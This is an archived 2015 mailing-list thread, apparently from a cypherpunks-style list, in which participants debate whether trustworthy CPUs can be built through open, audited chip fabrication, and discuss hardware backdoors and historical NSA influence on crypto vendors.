> their computer, pull it up on their screen, and watch the whole > thing play out before your eyes... on down the line till out > pops a chip in your hand, yay! That's not what I have in mind at all. Everything that touches the production process would have to be isolated and audited. In practical terms, that would mean bringing the computers in question in from offsite, with relevant software already installed and validated. In the context at hand, watching the whole thing play out would consist of directing the whole process one step at a time, per a procedure created in collaboration with the contractor's engineering and QA departments. Optical masks and/or equivalent data files would be handled by client personnel and retained for validation. The chips that pop out would be under very stringent property control, and quite a lot of them would be torn down and thoroughly analyzed "at home" to validate the run. > But you failed to realize their computer and software probably > wasn't made by them, nor has any open to you audit crosscheck > been wrapped around it or it's operators and maintainers... on > down the line. You can carve a stick with a knife but you can't > really build a trusted cpu with an untrusted cpu. > > If the goal is to build an open trusted fab, you must build an > open trusted fab, by and with the hard and different > philosophical mofos who refuse to concur unless each step of > design, build and operation is plainly validated. Otherwise > you're just selling tourist tickets to the theme park. Just like doing it at an existing commercial facility, with the added advantage of much better control of physical access, hardware, etc. at the dedicated facility. Whether that advantage would be worth the extra costs, vs. real security improvements, depends on how reliable the post-production tear down and analysis of end product components is considered. "A difference that makes no difference is no difference." If it really is impossible to build a trusted CPU with an untrusted CPU, then it is not possible to build a trusted CPU. Fortunately, trust is not an absolute and there are ways to build relatively trustworthy systems from relatively untrustworthy components. A quote to the effect of "I do not care who votes, I only care who counts the votes" comes to mind but I'm too lazy to look it up right now. > This is old school TCSEC / CC applied to manufacturing. > > You have cost efficiency in that the knowledge of tool and chip > making already exists. You use that savings to offset cost of > rebuilding with TCSEC. As opposed to trying to impart trust > upon existing systems which is prohibitive. > >> Somewhere, the rising curve of security costs will cross a >> falling curve of security risks, and that's as good a place >> as any to draw a line. > > Trust is not defined by a point on a cost curve. I think that in the engineering and business worlds, trust is always a point on a cost curve. When Trust and Security are considered as absolutes, the costs of maintaining them rise exponentially until the protected assets die of resource starvation. Civilization as we know it is presently following the path of demanding absolute security, provided by rulers vested with absolute trust, to early termination. Getting more on the practical business of making IC chips into the public domain and widely distributed, enabling faster and decentralized recovery of today's industrial capabilities, is one of the benefits of open hardware development projects. The objectives of an open IC project include providing protections against institutional sabotage, but also the creation of protocols, documents and data that can be re-used and improved over time. Policies and protocols necessary to assure adequate transparency, including repeatability, would amount to enlarging the GPL ecosystem to encompass computer hardware as well as software. If such a project can't produce products that are cost effective for end users, it will remain at most a theme park ride for misguided investors. The "high security" angle looks like a place where potential customers and nearly off-the-shelf capabilities meet. :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVuaPYAAoJEDZ0Gg87KR0LVJQQAJVUA0uR0eWYzUkqB0+b1HQu kBejHQss7jyLU4qhCIfKaoVF7bZcnIZLydT+BP/OCybDHisqlKcK5lI/1Ic8s1w+ uAY78xV2c+3N4IMRe1CgkirGDGP9PUOZCn/1czme66yqPWtHioY+ayh76QDZIz3q PPSt1j7XnodgTJoHLR1uc//vlBo8gQAgja9m7q9k6U72gl4EXVS+4Qm8TN5fMFbJ wLE8q7YqAOw8iU5UIa7vO767OqxOsfXoghoyis5PhkHtQKCW24SapgEBosl+uuSw s+WsS92rYlwigPXMIec33WBjstxK6Z10aebbW1BjZce/r9GM1cX24vs4vN4tvQ1a jpxeazQGhp6xUKi9m5UZ0d3uoZtSCgfyoIXiTaa+aZ3VGWt+OyxgqjG0HzeIh2Kv qa0r+JGaCa59atzwfNEs2DYld70atUIeebNBYiwWapumX7MSqPgqYbBenK+lodI6 5BaO97iHeayLjjVUPL7BeVpFsk/XGMw7QT5mwPz8JSCv/jyjQPtihkFOmB9jXTIc DfHd72IgXLkXFr32HelZjLn7RQsiJwwafU3Eki0WdciQ0CvwmsZuB530uifnKy6b EqvOAGFvqpc1ahvonnwgZ7Bg/0GhvbIzuLab0PamMUJ7G88HtAZbgRSiVWKPY/Jk zm2xMpzVtMWnAGnRnjBj =qtx4 -----END PGP SIGNATURE----- From mirimir at riseup.net Thu Jul 30 01:22:33 2015 From: mirimir at riseup.net (Mirimir) Date: Thu, 30 Jul 2015 02:22:33 -0600 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> Message-ID: <55B9DEC9.1070500@riseup.net> On 07/30/2015 01:52 AM, grarpamp wrote: > On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney wrote: >> then it is not possible to build a trusted CPU. > > You watch while... I collect wood and ore and smelt into axe, you > trust axe. I split tree and assemble hut, you trust hut. I put > wheel in water and make mill, you trust flour. I give you magical > computer before I make abacus, you throw in river and order me > make abacus first. Eventually trusted CPU is made. Woah! How many years to build the tool chain to a trusted CPU? Also, how many people? And how to trust them? One bad apple, you know. From mirimir at riseup.net Thu Jul 30 01:39:08 2015 From: mirimir at riseup.net (Mirimir) Date: Thu, 30 Jul 2015 02:39:08 -0600 Subject: Open Fabs In-Reply-To: <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> Message-ID: <55B9E2AC.7080400@riseup.net> On 07/30/2015 02:32 AM, oshwm wrote: > would a pre-internet era set of IC's and components kick-start the process a little without losing too much trust? > Use slow old IC's in parallel to gain something usable :) There was NSA before Internet ;) > On 30 July 2015 09:22:33 BST, Mirimir wrote: >> On 07/30/2015 01:52 AM, grarpamp wrote: >>> On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney >> wrote: > >> > >>>> then it is not possible to build a trusted CPU. >>> >>> You watch while... I collect wood and ore and smelt into axe, you >>> trust axe. I split tree and assemble hut, you trust hut. I put >>> wheel in water and make mill, you trust flour. I give you magical >>> computer before I make abacus, you throw in river and order me >>> make abacus first. Eventually trusted CPU is made. > >> Woah! How many years to build the tool chain to a trusted CPU? > >> Also, how many people? And how to trust them? One bad apple, you know. > > From grarpamp at gmail.com Thu Jul 30 00:52:29 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 03:52:29 -0400 Subject: Open Fabs In-Reply-To: <55B9A3DA.3040701@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> Message-ID: On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney wrote: >>> staff, with particular attention to choke points where > > That's not what I have in mind at all. Everything that touches > the production process would have to be isolated and audited. In > practical terms, that would mean bringing the computers in > question in from offsite, with relevant software already installed > and validated. People talk a lot about refitting and auditing existing setups. There's a lot of inbred friction there so the cost to successfully do that vs. a complete ground up trusted rebuild may be roughly equivalent. Therefore if so why not just choose the latter? > In the context at hand, watching the whole thing play out would > consist of directing the whole process one step at a time, per a > procedure created in collaboration with the contractor's > engineering and QA departments. Optical masks and/or equivalent > data files would be handled by client personnel and retained for > validation. The chips that pop out would be under very stringent > property control, and quite a lot of them would be torn down and > thoroughly analyzed "at home" to validate the run. Still sounds like untrusted base, chicken and egg. http://s12.postimg.org/n93g4udql/DSCF0431_who_came_first.jpg > depends on how reliable the post-production tear down and analysis > of end product components is considered. > A quote to the effect of "I do not care who votes, I > only care who counts the votes" comes to mind And how do you propose to count the votes when your ballots are measured in square nanometers and your counting machines are all made by one secretive company and composed of anywhere between 1B and 6B untrusted logic gates? Did you ever hear Intel say "our own designs and fabs have no backdoors and we're not subject to backdooring"? Did you ever hear GlobalF say "we don't inject backdoors in customer silicon and we're not subject to backdooring"? Would it mean anything to you if they did? Would it make any difference if they offered you a field trip? Do independants actually think their oneoff decap validation project proves or gives odds on the entire line and distribution chain? And when was any Intel / AMD CPU last publicly decapped and fully audited? 8088? Never? >> This is old school TCSEC / CC applied to manufacturing. > then it is not possible to build a trusted CPU. You watch while... I collect wood and ore and smelt into axe, you trust axe. I split tree and assemble hut, you trust hut. I put wheel in water and make mill, you trust flour. I give you magical computer before I make abacus, you throw in river and order me make abacus first. Eventually trusted CPU is made. > I think that in the engineering and business worlds, trust is > always a point on a cost curve. I'd have more trust in some kid to not destroy my lawn with the mower for $10 than some company for $50. Govt contracts seem to deliver more debt than trust and are prime example that trust and cost are separate. If not, then the HUNDREDS OF BILLIONS governments spend a year would have resulted in 5 9's of trust decades ago. But no, they can't even keep OPM secure from crackers, let alone backdoored cpu's they import from Malay fabs. Put well under 1/100 of that pie a year for a few years into a trusted open fab project and I'd bet you can get "Beyond A1" consumer gear out the other end at tolerable prices. Don't forget to charge 10+ times more for government jobs :) From grarpamp at gmail.com Thu Jul 30 01:06:21 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 04:06:21 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: On Thu, Jul 30, 2015 at 1:34 AM, Softy wrote: >> > IMO the same kind of radical transparency should apply to all >> > industrial processes that pose large potential hazards to public >> > health & safety, i.e. nuclear power stations, transgenic >> > agriculture, etc. > > It seems very quickly an OpenFab plant will need to implement the same > security as a current conventional plant. This will of necessity include > keeping out plebs/civilians/non-plant workers. And there you go again not > knowing whose doing what within the plant. Unless you happen to be on the > inside ... Not necessarily. Completely and immutably document the plant build from the start. No part of the build or operation moves forward unless all concur it meets spec. Security yes, no need to touch the machines or workers as those have all met spec beforehand. Any one could still visit and walk the gangway, peruse webcams from home, download the document set, etc. Trust is not merely a point, but how you got there and how you maintain it thereafter. From oshwm at openmailbox.org Thu Jul 30 01:32:41 2015 From: oshwm at openmailbox.org (oshwm) Date: Thu, 30 Jul 2015 09:32:41 +0100 Subject: Open Fabs In-Reply-To: <55B9DEC9.1070500@riseup.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> Message-ID: <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 would a pre-internet era set of IC's and components kick-start the process a little without losing too much trust? Use slow old IC's in parallel to gain something usable :) On 30 July 2015 09:22:33 BST, Mirimir wrote: >On 07/30/2015 01:52 AM, grarpamp wrote: >> On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney >wrote: > > > >>> then it is not possible to build a trusted CPU. >> >> You watch while... I collect wood and ore and smelt into axe, you >> trust axe. I split tree and assemble hut, you trust hut. I put >> wheel in water and make mill, you trust flour. I give you magical >> computer before I make abacus, you throw in river and order me >> make abacus first. Eventually trusted CPU is made. > >Woah! How many years to build the tool chain to a trusted CPU? > >Also, how many people? And how to trust them? One bad apple, you know. -----BEGIN PGP SIGNATURE----- Version: APG v1.1.1 iQI7BAEBCgAlBQJVueEpHhxvc2h3bSA8b3Nod21Ab3Blbm1haWxib3gub3JnPgAK CRAqeAcYSpG1iBsiEACTMmkDG9ina2qlKycleGKuqwY54aqh6KTXC5BDjlKHuuR5 b7B9Hc/eQRgh46wFghM858YCxF4qLM6czMeJG3G6B2SxfZCXtdZerlhWjdu9a+MJ lQmZCqj06or6I1n1VkzPM26YWECAFp5+BXN5gGNO9y8o3d4SvS8GcuFnpbP2Ubha p/+/ediqbJKXsl0X8rUv7pnLuo9yPhwgIGgtVdHi3Mq4yYvPlMSw1WfCI2Ha2K9K kkSJyfLDmRHxqGc0dbCTFW49td6k15KwgQxgucLcLYwkfMZK6ZmKcO/fh6QJwC6E i1zVJQc/6Sy9OgEakJOCeW8R+EWODdOZ88yEnHopeSi5o/rRZ8PkuSCEHureJbMb IWTZCWN87VFCOcJFmDzKaW44Eqd464Q0xOIkxWec1hjJwWCE7XtfHx7IVUtLhus4 8taN2Ih6EtD3XbeIxLegBOxIezo39AB/4QFsYM+DPQ4XsMkcoBW3FFHD4EN+Yyol 7TQmMV02x2yJ6fegheufheNZpl+ZJ0ZVRA4CNaFEWREGYRj1BhOoVazL7BnNCM3n v8QZU2n0kK4ugu8xk1E+hJ2LaZU6oDiAv8CDjG3fVRcXEqFweyyjVTkn+AVzftQZ pqXVd2yeE8ysrqy1Xemf5AlJgiUW4UgbwgSUT6oVhtiGuBD+hW0XM2i7SCh8Tg== =5D9H -----END PGP SIGNATURE----- From oshwm at openmailbox.org Thu Jul 30 02:03:23 2015 From: oshwm at openmailbox.org (oshwm) Date: Thu, 30 Jul 2015 10:03:23 +0100 Subject: Open Fabs In-Reply-To: <55B9E2AC.7080400@riseup.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55B9E2AC.7080400@riseup.net> Message-ID: <2526DBD7-75B0-47C2-866F-ED6E46F53ECC@openmailbox.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 my point being that without a publicly available global network then backdooring IC's may not have been something they were interested in :) But i guess they could still have seen some value in doing this and having modems phone home. On 30 July 2015 09:39:08 BST, Mirimir wrote: >On 07/30/2015 02:32 AM, oshwm wrote: >> would a pre-internet era set of IC's and components kick-start the >process a little without losing too much trust? >> Use slow old IC's in parallel to gain something usable :) > >There was NSA before Internet ;) > >> On 30 July 2015 09:22:33 BST, Mirimir wrote: >>> On 07/30/2015 01:52 AM, grarpamp wrote: >>>> On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney > >>> wrote: >> >>> >> >>>>> then it is not possible to build a trusted CPU. >>>> >>>> You watch while... I collect wood and ore and smelt into axe, you >>>> trust axe. I split tree and assemble hut, you trust hut. I put >>>> wheel in water and make mill, you trust flour. I give you magical >>>> computer before I make abacus, you throw in river and order me >>>> make abacus first. Eventually trusted CPU is made. >> >>> Woah! How many years to build the tool chain to a trusted CPU? >> >>> Also, how many people? And how to trust them? One bad apple, you >know. >> >> -----BEGIN PGP SIGNATURE----- Version: APG v1.1.1 iQI7BAEBCgAlBQJVuehbHhxvc2h3bSA8b3Nod21Ab3Blbm1haWxib3gub3JnPgAK CRAqeAcYSpG1iDRND/9P0X42LewKBvlsCAuwi1vA385Nsu2aNj0baJ41L1Fdes5R nDHLUrAkJiE0zw1G/xxJofcYIGOk06nv43cMecX2vKMOASiIoe6214l/JvviEpI0 gRe6ytHyqUfw14Uehk7WnolB/YyukyqbfIxDcrmy6BIS8cXvHBOhAiFCyQMlLVil 7erYSSphRYvn4jSEmBGdooKU/h1YYnD128pnKAO5DJm84fP7YRUFtLsy0ajI3JeA cyY2WQF/Po7lkpjIq0a8Lwbx+Q0UG3iqCbCpB3bDyc6RK7NOWMxx4nJr6oxyF5D1 c5DZLDqIZ5AWjhWpno4+PH7xWOmYigV3lCIHCh8YurIRGQ8mhYQrInBF4N36jrs+ PT30CnR9T/EGQ6cdVg8egRsmOBB5C3c7e4+8iSZ1D3kefbf/xDMmV+E4CCSXbmc2 kHbrPU+bn5U1TN3mV3VY2OowDAeyJYu4U+XvOpCr8NH/qQ9uIp6dEfjIILBpcC4s ewD0ZxOwfJfsWwCulgr/rfWg6N33o4IInp+vSaoSIqaRPKIVGcHDp+3452b9lNJf YBgmrjLyzB0QM/7+3JV7e5Ab1URgi4fBcgsK2lE2WdbmsykNE4BchnGH8RAPpCpH 39IZ7pC0tGNLDrbn5rHsw21N0pWoEkQztPTFkw/jSW9K6Lef4WW14OYM8FiEVA== =39nR -----END PGP SIGNATURE----- From drwho at virtadpt.net Thu Jul 30 10:04:32 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 30 Jul 2015 10:04:32 -0700 Subject: Open Fabs In-Reply-To: <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> Message-ID: <55BA5920.5000903@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/30/2015 01:32 AM, oshwm wrote: > would a pre-internet era set of IC's and components kick-start the > process a little without losing too much trust? Use slow old IC's > in parallel to gain something usable :) Something like this? http://cpuville.com/ Or this? http://www.homebrewcpu.com/ Or maybe something like this, seeing as how we really can't trust anything integrated as the microscopic level or smaller? http://6502.org/users/dieter/mt15/mt15.htm Hell, why don't we just start building DCPU-16's and bootstrap from there? https://en.wikipedia.org/wiki/0x10c - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Maybe just one little bunny, huh?" -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVulkaAAoJED1np1pUQ8RkKZ0P/jNrzc8Nj/+ph/0qLpWwXkL1 4kkgMNlufAxiq665KlZsF3zgJbvdzTmfp/25d2p/YARFPHP39Z5rVR/TX7Eo41z2 WXpkO5GyRGcE11QcGLZnMsxu+G4dwzxa3upg375IP3iXwAbL5TJrVKuc8X6XOeRp L/fZRusppqb5Ib+GHEGnKg7k6oonpWghvssciGRz6eunOr/nwAV/CGyi2ct11qQw PWAAVkP9GnLdsfA95K3hZCx1IR3f49DmGmaKLI2lYatXpLehDfhNdyxp7VDux2fi +7lQAfonWvTH16cBhCUiPkSg2jmUfhzWEFnleKgsn1J6cg6DjwTu6kTwiYR02Bau WvkZvuMxBkhDXLwcjb++sSs/dgLmpzLOin1UonGNswi+VnE4vTU87Bac4kU9Lpuo JgLtRZcDS5RBZCsxZ4gzZ3k/CmZsOl+/WjuRAETk3JyMakgAzLVHPmpONfpwAAgL gJ38/ru8rfT+h4DPThSRBuDTBm/AK7EiONAYha3pjLtZt7NVJumN86cqkRPP/WEJ KW6CqkoLCv2uPReHGadIPnA7KRWutK37UhO6ENuX5tHkeXFoW9dfsl5iq5wuUISn z7vD86TwVBWnvXpub3qtIHkCBe3Uy8ViEJEFzASX/DLJ0nchFt5Xb5l+wM8xSaL1 l952XGi/5QFA843nWvkQ =Bb5g -----END PGP SIGNATURE----- From jya at pipeline.com Thu Jul 30 07:52:17 2015 From: jya at pipeline.com (John Young) Date: Thu, 30 Jul 2015 10:52:17 -0400 Subject: William Friedman's 1955 Crypto AG visit reports draft and final redactions Message-ID: William Friedman's 1955 draft Crypto AG visit report shows text redacted in final version and vice versa. Two versions compared: https://cryptome.org/2015/07/nsa-crypto-ag-compared.pdf (20MB) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 273 bytes Desc: not available URL: From grarpamp at gmail.com Thu Jul 30 11:19:10 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 14:19:10 -0400 Subject: Open Fabs In-Reply-To: <55B9DEC9.1070500@riseup.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> Message-ID: On Thu, Jul 30, 2015 at 4:22 AM, Mirimir wrote: >>> then it is not possible to build a trusted CPU. >> >> You watch while... I collect wood and ore and smelt into axe, you >> trust axe. I split tree and assemble hut, you trust hut. I put >> wheel in water and make mill, you trust flour. I give you magical >> computer before I make abacus, you throw in river and order me >> make abacus first. Eventually trusted CPU is made. > Woah! How many years to build the tool chain to a trusted CPU? As before, the knowledge already exists, so physical replication from the ground up should be very fast. TCSEC is not unknown, but designing and embedding it into every process is rather new (both as mindset and applied) so it will take some time and must be done beforehand. > Also, how many people? And how to trust them? One bad apple, you know. Again... draw interested people from multiple philosophical sectors, use multiple man rule, consensus rule. You don't have to trust them outside the fab, only observe them inside. The more principled zealots like Stallman and Juan involved the more likely somone will flag upon trust violation. The human problem is hard. But at the end of the day, if the outcome of the project (trusted chips) is important, the right people will come together to do it and the level of trust achieved will be orders of magnitude higher than what exists today. From grarpamp at gmail.com Thu Jul 30 11:42:02 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 14:42:02 -0400 Subject: Open Fabs In-Reply-To: <55BA5920.5000903@virtadpt.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> Message-ID: On Thu, Jul 30, 2015 at 1:04 PM, The Doctor wrote: > On 07/30/2015 01:32 AM, oshwm wrote: >> would a pre-internet era set of IC's and components kick-start the >> process a little without losing too much trust? Use slow old IC's >> in parallel to gain something usable :) > > Something like this? > http://cpuville.com/ > http://www.homebrewcpu.com/ > Or maybe something like this, seeing as how we really can't trust > anything integrated as the microscopic level or smaller? > http://6502.org/users/dieter/mt15/mt15.htm Those are close and would certainly be a goalpost in the rebuild. You might be able to trust logic gates because you can exhaustively test their logic. On the other hand, how do you know that once you connect enough of them to each other that their secret gates inside don't sense each other and activate? Since you're that close to stone age anyway, why not start one more step back at relays and core memory. It's like trying to validate a 256 bit blackbox hash function someone gives you... sure, their supplied test vectors may all pass, but you have no idea or way to test what happens when you start pushing real data through the secret instructions. You simply can't test all the possible data combinations so you have to throw their box back in the snakeoil. > Hell, why don't we just start building DCPU-16's and bootstrap from there? > https://en.wikipedia.org/wiki/0x10c That's too complex, and the first one pre-exists so it's chicken and egg. From drwho at virtadpt.net Thu Jul 30 15:11:44 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 30 Jul 2015 15:11:44 -0700 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> Message-ID: <55BAA120.2050901@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/30/2015 11:42 AM, grarpamp wrote: > because you can exhaustively test their logic. On the other hand, > how do you know that once you connect enough of them to each other > that their secret gates inside don't sense each other and activate? > Since you're that close to stone age anyway, why not start one more > step back at relays and core memory. So what you're basically saying is that the entire tech stack, all the way back to far edge pf electromechanical information processing is basically completely untrustworthy. There is no way at all to trust anything that we can't actually see the logic gates of with the naked eye, which would put us... where? Maybe tens of computations per second, at most? A little more (but not much)? Fuck it. Time to go home, everyone. They Won. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "The cafe' hates boring." --Blackie, _Nightmare Cafe'_ -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVuqEUAAoJED1np1pUQ8RkwzQP/jGEBDZSqwQU/EHJSkfDdk+t d8jotLo5Iixzjybm8ThzHMPPtH9CyQK3OxuiNGRU6KXY+23gIkQBM314DK7+Ww10 VGZDPJC0t04UW1ycB3oP1zX834Lxq/pff9nkmfscyzuaNTCC4LV/8Fj2blqD4oXJ JHy9Jtr0FEz5v/p8NWEOnfP0pr2uBqQatw9dfFiFT2lCx01gw8E8H57rbE+sE4FE rmaGyOihAYCSLqBmDcMALnvuKKLQcgDHpfmPaR8UCpHKNp2HZQWYMOzKPUnLUE82 vFP4Qc13XJIUcRgWW9wKSkKjkjfpZsS1YTTAieiIoOnvzuXPswVBHQfCSwuyiMgN 7thrUa4SmD+kwJ9E/rNB8wnqkqff+i3NdHnzNvytI78bMF8tPA/pQUfWXJUC77Xy f8BUtH6VAug4ONaDqopIx3cZxtuxbX7BUrSjoCZ7O7pzbHM3okTzE/34QQipK1fG CUfgEso32OIRTrlC1IgDjRPxAMcPxeN+5KgIwSpyhZa31pniOVI6A0brfSQNY8zc sALD9zAIiSBnolrSKQR87uENugtxed+7p2br+pMktwc/3dFI5qr0tbCLNXCeRP2w PpHUnfxS5nMylezulHZM9xfvpBRighChnGTSvd/soMPb4tJJgYql1jPNOoN8bvoq S6nDJrQ0fGuUyFmv5Ou0 =eY7F -----END PGP SIGNATURE----- From wirelesswarrior at safe-mail.net Thu Jul 30 12:13:50 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Thu, 30 Jul 2015 15:13:50 -0400 Subject: Open Fabs Message-ID: I still maintain that bootstapping is best done using EBL to create LSI and less complex VLSI (USB chips, CPLD and FPGA). Sure EBL is slow but it can eliminate the cost and complexity of masking. EBL immensely simplifies the foundry and offers the possibility for OS distributed design and manufacture, affordable for "maker" groups, without involving a commercial entity. The number of trusted parties shrinks significantly. From schear.steve at gmail.com Thu Jul 30 08:49:56 2015 From: schear.steve at gmail.com (Steven Schear) Date: Thu, 30 Jul 2015 15:49:56 +0000 Subject: William Friedman's 1955 Crypto AG visit reports draft and final redactions In-Reply-To: References: Message-ID: During the early 90s I worked at Cylink, a Crypto AG competitor. We too received a NSA visit about weakening products sold to certain clients (e.g., so-called narco-terrorists). I and the other directors were told of this (because we had legal responsibilities and liabilities) at a meeting. I assume we made the changes requested (e.g., weakening the RNG to NSA specifications). The special units were sold through a selected distributor in Louisiana (probably also a NSA contractor). On Thu, Jul 30, 2015 at 2:52 PM, John Young wrote: > William Friedman's 1955 draft Crypto AG visit report shows text > redacted in final version and vice versa. Two versions compared: > > https://cryptome.org/2015/07/nsa-crypto-ag-compared.pdf > (20MB) > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1131 bytes Desc: not available URL: From grarpamp at gmail.com Thu Jul 30 14:19:32 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 17:19:32 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: On Thu, Jul 30, 2015 at 3:13 PM, wrote: > I still maintain that bootstapping is best done using EBL to create LSI and less complex VLSI (USB chips, CPLD and FPGA). Sure EBL is slow but it can eliminate the cost and complexity of masking. EBL immensely simplifies the foundry and offers the possibility for OS distributed design and manufacture, affordable for "maker" groups, without involving a commercial entity. The number of trusted parties shrinks significantly. Who can spot the two untrusted parties in this chickenegg EBL rig? https://en.wikipedia.org/wiki/File:EB_litograph.jpg And what are they driving? D-oh. EBL would be fine if it's control was rebuilt as trusted gear. Just links... https://en.wikipedia.org/wiki/Electron-beam_lithography https://en.wikipedia.org/wiki/Integrated_circuit#VLSI https://en.wikipedia.org/wiki/Universal_Systems_Language https://en.wikipedia.org/wiki/File:Apollo_guidiance_computer_ferrit_core_memory.jpg https://en.wikipedia.org/wiki/File:Agc_nor2.jpg https://www.youtube.com/watch?v=k4oGI_dNaPc https://www.youtube.com/watch?v=n3wPBcmSb2U From juan.g71 at gmail.com Thu Jul 30 14:31:47 2015 From: juan.g71 at gmail.com (Juan) Date: Thu, 30 Jul 2015 18:31:47 -0300 Subject: Open Fabs In-Reply-To: <2526DBD7-75B0-47C2-866F-ED6E46F53ECC@openmailbox.org> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55B9E2AC.7080400@riseup.net> <2526DBD7-75B0-47C2-866F-ED6E46F53ECC@openmailbox.org> Message-ID: <55ba9755.05a58c0a.3166.739f@mx.google.com> On Thu, 30 Jul 2015 10:03:23 +0100 oshwm wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > my point being that without a publicly available global network then > backdooring IC's may not have been something they were interested > in :) It should be possible to use 'older' components that can't be backdoored or that are highly unlikely to be backdoored to build tools to validate newer untrusted systems? > > But i guess they could still have seen some value in doing this and > having modems phone home. > > > From grarpamp at gmail.com Thu Jul 30 17:13:08 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 20:13:08 -0400 Subject: Open Fabs In-Reply-To: <55BAA120.2050901@virtadpt.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> <55BAA120.2050901@virtadpt.net> Message-ID: On Thu, Jul 30, 2015 at 6:11 PM, The Doctor wrote: > So what you're basically saying is that the entire tech stack, all the > way back to far edge pf electromechanical information processing is > basically completely untrustworthy. A purist might say that, and you'd have a hard time refuting them because for the most part, you raced to build a system that "works", not necessarily one you "trust" or that is proofed. The point is, that if you're going to consider, analyze, create and certify trust, you have to rip apart your current way of thinking in some pretty mind bending ways. Because everyone has been cultured since birth to accept things that are blindly handed to them as trusted. Where along the historical line of tools would you feel confident or shaky in using such tool, effectively blindly dropped into your hand, to create or do something you trust with it, and why? >From sandpaper to CNC machine... >From knife to MRI... >From relay to the latest Xeons and ARM's... https://www.schneier.com/blog/archives/2006/01/countering_trus.html Even with things like this, when it comes to hardware it's still turtles. You can't use an Intel CPU to crosscheck an Intel CPU. With actors like the NSA and datagrabber ideology inserting and rooting stuff everywhere, you probably can't use any other closed CPU either. Destructively testing your rig just to replace it with an untested copy is pointless. > There is no way at all to trust > anything that we can't actually see the logic gates of with the naked > eye Theoretically, if the image data is passed through a computer to your eye on the screen, yes. Unless you know that the entire history and process that produced the suspect gates that were just placed in your hand (or equivalently, your imaging rig)... is trusted. > which would put us... where? Maybe tens of computations per > second, at most? A little more (but not much)? No, use that level to build the next faster and so on. > Fuck it. Time to go home, everyone. They Won. Purists? Turtles? Who knows. But one thing's for certain, today's hardware and production is closed. And just as with closed source software, it would be a far stretch to point at the billion+ transistors on your desk and genuinely say "Yeah, I trust that". That should be enough reason to put serious thought and action into creating an opensource process that 